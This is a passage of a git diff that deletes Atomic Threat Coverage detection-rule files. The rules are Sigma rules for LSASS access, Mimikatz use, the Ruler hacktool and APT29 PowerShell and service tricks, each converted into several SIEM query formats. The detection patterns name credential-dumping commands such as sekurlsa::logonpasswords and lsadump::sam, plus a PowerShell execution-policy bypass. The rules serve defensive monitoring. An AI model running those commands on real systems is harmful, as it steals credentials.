-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Weak Encryption Enabled and Kerberoast'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4738" AND Message.keyword:(*DES* *Preauth* *Encrypted*) AND Message.keyword:(*Enabled*))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4738" (Message="*DES*" OR Message="*Preauth*" OR Message="*Encrypted*") (Message="*Enabled*"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4738" Message IN ["*DES*", "*Preauth*", "*Encrypted*"] Message IN ["*Enabled*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4738)(?=.*(?:.*.*DES.*|.*.*Preauth.*|.*.*Encrypted.*))(?=.*(?:.*.*Enabled.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_alert_lsass_access.md b/Atomic_Threat_Coverage/Detection_Rules/win_alert_lsass_access.md
deleted file mode 100644
index 29d456a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_alert_lsass_access.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | LSASS Access Detected via Attack Surface Reduction       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Access to LSASS Process |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Google Chrome GoogleUpdate.exe</li><li>Some Taskmgr.exe related activity</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter)</li></ul>  |
-| **Author**               | Markus Neis |
-| Other Tags           | <ul><li>attack.t1003.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: LSASS Access Detected via Attack Surface Reduction
-id: a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98
-description: Detects Access to LSASS Process
-status: experimental
-references:
-    - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter
-author: Markus Neis
-date: 2018/08/26
-tags:
-    - attack.credential_access
-    - attack.t1003
-# Defender Attack Surface Reduction
-    - attack.t1003.001
-logsource:
-    product: windows_defender
-    definition: 'Requirements:Enabled Block credential stealing from the Windows local security authority subsystem (lsass.exe) from Attack Surface Reduction (GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2)'
-detection:
-    selection:
-        EventID: 1121
-        Path: '*\lsass.exe'
-    condition: selection
-falsepositives:
-    - Google Chrome GoogleUpdate.exe
-    - Some Taskmgr.exe related activity
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent | where {($_.ID -eq "1121" -and $_.message -match "Path.*.*\\lsass.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"1121" AND winlog.event_data.Path.keyword:*\\lsass.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98 <<EOF
-{
-  "metadata": {
-    "title": "LSASS Access Detected via Attack Surface Reduction",
-    "description": "Detects Access to LSASS Process",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.001"
-    ],
-    "query": "(winlog.event_id:\"1121\" AND winlog.event_data.Path.keyword:*\\\\lsass.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"1121\" AND winlog.event_data.Path.keyword:*\\\\lsass.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'LSASS Access Detected via Attack Surface Reduction'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"1121" AND Path.keyword:*\\lsass.exe)
-```
-
-
-### splunk
-    
-```
-(EventCode="1121" Path="*\\lsass.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1121" Path="*\\lsass.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*1121)(?=.*.*\lsass\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_alert_mimikatz_keywords.md b/Atomic_Threat_Coverage/Detection_Rules/win_alert_mimikatz_keywords.md
deleted file mode 100644
index 99fb341..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_alert_mimikatz_keywords.md
+++ /dev/null
@@ -1,196 +0,0 @@
-| Title                    | Mimikatz Use       |
-|:-------------------------|:------------------|
-| **Description**          | This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups) |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Naughty administrators</li><li>Penetration test</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.s0002</li><li>car.2013-07-001</li><li>car.2019-04-004</li><li>attack.t1003.002</li><li>attack.t1003.004</li><li>attack.t1003.001</li><li>attack.t1003.006</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Mimikatz Use
-id: 06d71506-7beb-4f22-8888-e2e5e2ca7fd8
-description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)
-author: Florian Roth
-date: 2017/01/10
-modified: 2019/10/11
-tags:
-    - attack.s0002
-    - attack.t1003
-    - attack.lateral_movement
-    - attack.credential_access
-    - car.2013-07-001
-    - car.2019-04-004
-    - attack.t1003.002
-    - attack.t1003.004
-    - attack.t1003.001
-    - attack.t1003.006
-logsource:
-    product: windows
-detection:
-    keywords:
-        Message:
-            - "* mimikatz *"
-            - "* mimilib *"
-            - "* <3 eo.oe *"
-            - "* eo.oe.kiwi *"
-            - "* privilege::debug *"
-            - "* sekurlsa::logonpasswords *"
-            - "* lsadump::sam *"
-            - "* mimidrv.sys *"
-            - "* p::d *"
-            - "* s::l *"
-    condition: keywords
-falsepositives:
-    - Naughty administrators
-    - Penetration test
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent | where {($_.message -match "Message.*.* mimikatz .*" -or $_.message -match "Message.*.* mimilib .*" -or $_.message -match "Message.*.* <3 eo.oe .*" -or $_.message -match "Message.*.* eo.oe.kiwi .*" -or $_.message -match "Message.*.* privilege::debug .*" -or $_.message -match "Message.*.* sekurlsa::logonpasswords .*" -or $_.message -match "Message.*.* lsadump::sam .*" -or $_.message -match "Message.*.* mimidrv.sys .*" -or $_.message -match "Message.*.* p::d .*" -or $_.message -match "Message.*.* s::l .*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-Message.keyword:(*\ mimikatz\ * OR *\ mimilib\ * OR *\ <3\ eo.oe\ * OR *\ eo.oe.kiwi\ * OR *\ privilege\:\:debug\ * OR *\ sekurlsa\:\:logonpasswords\ * OR *\ lsadump\:\:sam\ * OR *\ mimidrv.sys\ * OR *\ p\:\:d\ * OR *\ s\:\:l\ *)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/06d71506-7beb-4f22-8888-e2e5e2ca7fd8 <<EOF
-{
-  "metadata": {
-    "title": "Mimikatz Use",
-    "description": "This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)",
-    "tags": [
-      "attack.s0002",
-      "attack.t1003",
-      "attack.lateral_movement",
-      "attack.credential_access",
-      "car.2013-07-001",
-      "car.2019-04-004",
-      "attack.t1003.002",
-      "attack.t1003.004",
-      "attack.t1003.001",
-      "attack.t1003.006"
-    ],
-    "query": "Message.keyword:(*\\ mimikatz\\ * OR *\\ mimilib\\ * OR *\\ <3\\ eo.oe\\ * OR *\\ eo.oe.kiwi\\ * OR *\\ privilege\\:\\:debug\\ * OR *\\ sekurlsa\\:\\:logonpasswords\\ * OR *\\ lsadump\\:\\:sam\\ * OR *\\ mimidrv.sys\\ * OR *\\ p\\:\\:d\\ * OR *\\ s\\:\\:l\\ *)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "Message.keyword:(*\\ mimikatz\\ * OR *\\ mimilib\\ * OR *\\ <3\\ eo.oe\\ * OR *\\ eo.oe.kiwi\\ * OR *\\ privilege\\:\\:debug\\ * OR *\\ sekurlsa\\:\\:logonpasswords\\ * OR *\\ lsadump\\:\\:sam\\ * OR *\\ mimidrv.sys\\ * OR *\\ p\\:\\:d\\ * OR *\\ s\\:\\:l\\ *)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Mimikatz Use'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Message.keyword:(* mimikatz * * mimilib * * <3 eo.oe * * eo.oe.kiwi * * privilege\:\:debug * * sekurlsa\:\:logonpasswords * * lsadump\:\:sam * * mimidrv.sys * * p\:\:d * * s\:\:l *)
-```
-
-
-### splunk
-    
-```
-(Message="* mimikatz *" OR Message="* mimilib *" OR Message="* <3 eo.oe *" OR Message="* eo.oe.kiwi *" OR Message="* privilege::debug *" OR Message="* sekurlsa::logonpasswords *" OR Message="* lsadump::sam *" OR Message="* mimidrv.sys *" OR Message="* p::d *" OR Message="* s::l *")
-```
-
-
-### logpoint
-    
-```
-Message IN ["* mimikatz *", "* mimilib *", "* <3 eo.oe *", "* eo.oe.kiwi *", "* privilege::debug *", "* sekurlsa::logonpasswords *", "* lsadump::sam *", "* mimidrv.sys *", "* p::d *", "* s::l *"]
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.* mimikatz .*|.*.* mimilib .*|.*.* <3 eo\.oe .*|.*.* eo\.oe\.kiwi .*|.*.* privilege::debug .*|.*.* sekurlsa::logonpasswords .*|.*.* lsadump::sam .*|.*.* mimidrv\.sys .*|.*.* p::d .*|.*.* s::l .*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_alert_ruler.md b/Atomic_Threat_Coverage/Detection_Rules/win_alert_ruler.md
deleted file mode 100644
index f188e7b..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_alert_ruler.md
+++ /dev/null
@@ -1,193 +0,0 @@
-| Title                    | Hacktool Ruler       |
-|:-------------------------|:------------------|
-| **Description**          | This events that are generated when using the hacktool Ruler by Sensepost |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1087: Account Discovery](https://attack.mitre.org/techniques/T1087)</li><li>[T1075: Pass the Hash](https://attack.mitre.org/techniques/T1075)</li><li>[T1114: Email Collection](https://attack.mitre.org/techniques/T1114)</li><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Go utilities that use staaldraad awesome NTLM library</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://github.com/sensepost/ruler](https://github.com/sensepost/ruler)</li><li>[https://github.com/sensepost/ruler/issues/47](https://github.com/sensepost/ruler/issues/47)</li><li>[https://github.com/staaldraad/go-ntlm/blob/master/ntlm/ntlmv1.go#L427](https://github.com/staaldraad/go-ntlm/blob/master/ntlm/ntlmv1.go#L427)</li><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776)</li><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1550.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Hacktool Ruler
-id: 24549159-ac1b-479c-8175-d42aea947cae
-description: This events that are generated when using the hacktool Ruler by Sensepost
-author: Florian Roth
-date: 2017/05/31
-modified: 2019/07/26
-references:
-    - https://github.com/sensepost/ruler
-    - https://github.com/sensepost/ruler/issues/47
-    - https://github.com/staaldraad/go-ntlm/blob/master/ntlm/ntlmv1.go#L427
-    - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776
-    - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624
-tags:
-    - attack.discovery
-    - attack.execution
-    - attack.t1087
-    - attack.t1075
-    - attack.t1114
-    - attack.t1059
-    - attack.t1550.002
-logsource:
-    product: windows
-    service: security
-detection:
-    selection1:
-        EventID:
-            - 4776
-        Workstation: 'RULER'
-    selection2:
-        EventID:
-            - 4624
-            - 4625
-        WorkstationName: 'RULER'
-    condition: (1 of selection*)
-falsepositives:
-    - Go utilities that use staaldraad awesome NTLM library
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(((($_.ID -eq "4776") -and $_.message -match "Workstation.*RULER") -or (($_.ID -eq "4624" -or $_.ID -eq "4625") -and $_.message -match "WorkstationName.*RULER"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND ((winlog.event_id:("4776") AND Workstation:"RULER") OR (winlog.event_id:("4624" OR "4625") AND winlog.event_data.WorkstationName:"RULER")))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/24549159-ac1b-479c-8175-d42aea947cae <<EOF
-{
-  "metadata": {
-    "title": "Hacktool Ruler",
-    "description": "This events that are generated when using the hacktool Ruler by Sensepost",
-    "tags": [
-      "attack.discovery",
-      "attack.execution",
-      "attack.t1087",
-      "attack.t1075",
-      "attack.t1114",
-      "attack.t1059",
-      "attack.t1550.002"
-    ],
-    "query": "(winlog.channel:\"Security\" AND ((winlog.event_id:(\"4776\") AND Workstation:\"RULER\") OR (winlog.event_id:(\"4624\" OR \"4625\") AND winlog.event_data.WorkstationName:\"RULER\")))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND ((winlog.event_id:(\"4776\") AND Workstation:\"RULER\") OR (winlog.event_id:(\"4624\" OR \"4625\") AND winlog.event_data.WorkstationName:\"RULER\")))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Hacktool Ruler'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:("4776") AND Workstation:"RULER") OR (EventID:("4624" "4625") AND WorkstationName:"RULER"))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (((EventCode="4776") Workstation="RULER") OR ((EventCode="4624" OR EventCode="4625") WorkstationName="RULER")))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" ((event_id IN ["4776"] Workstation="RULER") OR (event_id IN ["4624", "4625"] WorkstationName="RULER")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*(?:.*4776))(?=.*RULER))|.*(?:.*(?=.*(?:.*4624|.*4625))(?=.*RULER))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_apt29_thinktanks.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_apt29_thinktanks.md
deleted file mode 100644
index 823403b..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_apt29_thinktanks.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | APT29       |
-|:-------------------------|:------------------|
-| **Description**          | This method detects a suspicious powershell command line combination as used by APT29 in a campaign against US think tanks |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/](https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.g0016</li><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: APT29
-id: 033fe7d6-66d1-4240-ac6b-28908009c71f
-description: This method detects a suspicious powershell command line combination as used by APT29 in a campaign against US think tanks
-references:
-    - https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/
-tags:
-    - attack.execution
-    - attack.g0016
-    - attack.t1086
-    - attack.t1059.001
-author: Florian Roth
-date: 2018/12/04
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine: '*-noni -ep bypass $*'
-    condition: selection
-falsepositives:
-    - unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*-noni -ep bypass $.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:*\-noni\ \-ep\ bypass\ $*
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/033fe7d6-66d1-4240-ac6b-28908009c71f <<EOF
-{
-  "metadata": {
-    "title": "APT29",
-    "description": "This method detects a suspicious powershell command line combination as used by APT29 in a campaign against US think tanks",
-    "tags": [
-      "attack.execution",
-      "attack.g0016",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:*\\-noni\\ \\-ep\\ bypass\\ $*"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:*\\-noni\\ \\-ep\\ bypass\\ $*",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'APT29'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:*\-noni \-ep bypass $*
-```
-
-
-### splunk
-    
-```
-CommandLine="*-noni -ep bypass $*"
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*-noni -ep bypass $*")
-```
-
-
-### grep
-    
-```
-grep -P '^.*-noni -ep bypass \$.*'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_apt29_tor.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_apt29_tor.md
deleted file mode 100644
index 6812843..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_apt29_tor.md
+++ /dev/null
@@ -1,195 +0,0 @@
-| Title                    | APT29 Google Update Service Install       |
-|:-------------------------|:------------------|
-| **Description**          | This method detects malicious services mentioned in APT29 report by FireEye. The legitimate path for the Google update service is C:\Program Files (x86)\Google\Update\GoogleUpdate.exe so the service names and executable locations used by APT29 are specific enough to be detected in log files. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1050: New Service](https://attack.mitre.org/techniques/T1050)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html](https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html)</li></ul>  |
-| **Author**               | Thomas Patzke |
-| Other Tags           | <ul><li>attack.g0016</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: APT29 Google Update Service Install
-id: c069f460-2b87-4010-8dcf-e45bab362624
-description: This method detects malicious services mentioned in APT29 report by FireEye. The legitimate path for the Google update service is C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
-    so the service names and executable locations used by APT29 are specific enough to be detected in log files.
-references:
-    - https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html
-tags:
-    - attack.persistence
-    - attack.g0016
-    - attack.t1050
-date: 2017/11/01
-author: Thomas Patzke 
-logsource:
-    product: windows
-    service: system
-detection:
-    service_install:
-        EventID: 7045
-        ServiceName: 'Google Update'
-    timeframe: 5m
-    condition: service_install | near process
-falsepositives:
-    - Unknown
-level: high
----
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    process:
-        Image:
-            - 'C:\Program Files(x86)\Google\GoogleService.exe'
-            - 'C:\Program Files(x86)\Google\GoogleUpdate.exe'
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-
-```
-
-
-
-
-
-### powershell
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_apt_apt29_tor.yml): Only COUNT aggregation function is implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### es-qs
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_apt_apt29_tor.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/c069f460-2b87-4010-8dcf-e45bab362624 <<EOF
-{
-  "metadata": {
-    "title": "APT29 Google Update Service Install",
-    "description": "This method detects malicious services mentioned in APT29 report by FireEye. The legitimate path for the Google update service is C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe so the service names and executable locations used by APT29 are specific enough to be detected in log files.",
-    "tags": [
-      "attack.persistence",
-      "attack.g0016",
-      "attack.t1050"
-    ],
-    "query": "(winlog.event_id:\"7045\" AND winlog.event_data.ServiceName:\"Google\\ Update\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "5m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"7045\" AND winlog.event_data.ServiceName:\"Google\\ Update\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'APT29 Google Update Service Install'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
